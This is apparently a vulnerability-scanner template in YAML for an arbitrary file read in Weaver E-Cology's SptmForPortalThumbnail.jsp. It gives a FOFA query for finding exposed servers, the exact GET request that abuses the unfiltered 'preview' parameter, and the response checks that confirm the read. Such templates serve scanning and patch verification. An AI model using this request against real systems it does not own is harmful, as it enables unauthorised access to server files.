product: 泛微E-Cology
vName: 泛微E-Cology SptmForPortalThumbnail - Arbitrary File Read
type: 文件读取
vID: [ ]
level: 3
vDesc: The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
version: ''
note: ''
search:
  FOFA: app="泛微-E-Weaver"
protocol: http
link: http://124.223.89.192/archives/e-cology8-14
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp
    verify:
      logic: and
      check:
        - body:
            value:
              - weaver.general.BaseBean
              - getServletConfig
            logic: and
        - header:
            value:
              - image/png
            logic: and
        - status: 200
